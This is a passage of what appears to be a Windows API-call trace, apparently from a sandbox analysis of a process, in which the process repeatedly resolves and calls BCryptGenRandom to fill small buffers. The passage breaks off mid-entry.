[0259.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4ec7, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x4d4ec7) returned 0x0 [0259.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4eec, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x4d4eec) returned 0x0 [0259.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4f0f, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x4d4f0f) returned 0x0 [0259.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.202] BCryptGenRandom (in: 